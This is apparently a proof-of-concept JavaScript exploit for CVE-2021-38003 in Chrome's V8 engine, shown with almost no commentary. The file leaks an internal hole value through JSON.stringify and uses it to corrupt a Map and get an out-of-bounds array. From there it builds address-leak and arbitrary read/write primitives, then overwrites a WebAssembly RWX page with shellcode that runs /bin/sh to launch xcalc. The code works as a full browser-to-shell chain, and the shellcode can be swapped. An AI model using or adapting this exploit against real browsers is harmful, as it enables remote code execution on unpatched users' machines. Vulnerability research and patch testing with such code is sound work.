cve-2021-38003.js

/*
CVE-2021-38003
HEAD @ c573dcc8f8df81e79550c15c3c593129cd71437b

https://bugs.chromium.org/p/chromium/issues/detail?id=1263462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-38003
*/

var bs = new ArrayBuffer(8);
var fs = new Float64Array(bs);
var is = new BigUint64Array(bs);

function ftoi(val) {
  fs[0] = val;
  return is[0];
}

function itof(val) {
  is[0] = val;
  return fs[0];
}

function foo() {
  let s = '"'.repeat(8388607);

  let a = [];
  for (let i = 0; i < 40; i++)
    a[i] = s;
  a[41] = s;

  try {
    JSON.stringify([a]);
  } catch (hole) {
    return hole;
  }
}

function bar() {
  let hole = foo();

  let m = new Map();
  m.set(1, 1);
  m.set(hole, 1);
  m.delete(hole);
  m.delete(hole);
  m.delete(1);

  let a = new Array(1.1, 2.2);
  m.set(16, -1);
  m.set(a, 1337); 

  return a;
}

let oob = bar();

/* flt.elements @ oob[7] */
/* obj.elements @ oob[16] */
let flt = [1.1];
let tmp = {a: 1};
let obj = [tmp];

function addrof(o) {
  let a = ftoi(oob[16]) >> 32n;
  let b = ftoi(oob[7]) & 0xffffffffn;
  oob[7] = itof((a << 32n) + b);
  obj[0] = o;
  return (ftoi(flt[0]) & 0xffffffffn) - 1n;
}

function read(p) {
  let a = ftoi(oob[7]) & 0xffffffffn;
  oob[7] = itof(((p - 8n + 1n) << 32n) + a);
  return ftoi(flt[0]);
}

function write(p, x) {
  let a = ftoi(oob[7]) & 0xffffffffn;
  oob[7] = itof(((p - 8n + 1n) << 32n) + a);
  flt[0] = itof(x);
}

let wasm = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x85, 0x80, 0x80, 0x80,
  0x00, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03, 0x82, 0x80, 0x80, 0x80, 0x00, 0x01,
  0x00, 0x04, 0x84, 0x80, 0x80, 0x80, 0x00, 0x01, 0x70, 0x00, 0x00, 0x05, 0x83,
  0x80, 0x80, 0x80, 0x00, 0x01, 0x00, 0x01, 0x06, 0x81, 0x80, 0x80, 0x80, 0x00,
  0x00, 0x07, 0x91, 0x80, 0x80, 0x80, 0x00, 0x02, 0x06, 0x6d, 0x65, 0x6d, 0x6f,
  0x72, 0x79, 0x02, 0x00, 0x04, 0x6d, 0x61, 0x69, 0x6e, 0x00, 0x00, 0x0a, 0x8a,
  0x80, 0x80, 0x80, 0x00, 0x01, 0x84, 0x80, 0x80, 0x80, 0x00, 0x00, 0x41, 0x2a,
  0x0b
]);

let module = new WebAssembly.Module(wasm);
let instance = new WebAssembly.Instance(module);
let entry = instance.exports.main;

let rwx = read(addrof(instance) + 0x68n);

/* DISPLAY=':0.0' xcalc */ 
let shellcode = new Uint8Array([
  0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54,
  0x5f, 0x52, 0x66, 0x68, 0x2d, 0x63, 0x54, 0x5e, 0x52, 0xe8, 0x15, 0x00, 0x00,
  0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41, 0x59, 0x3d, 0x27, 0x3a, 0x30, 0x2e,
  0x30, 0x27, 0x20, 0x78, 0x63, 0x61, 0x6c, 0x63, 0x00, 0x56, 0x57, 0x54, 0x5e,
  0x6a, 0x3b, 0x58, 0x0f, 0x05
]);

let buf = new ArrayBuffer(shellcode.length);
let view = new DataView(buf);

write(addrof(buf) + 0x1cn, rwx);

for (let i = 0; i < shellcode.length; i++)
  view.setUint8(i, shellcode[i]);

entry();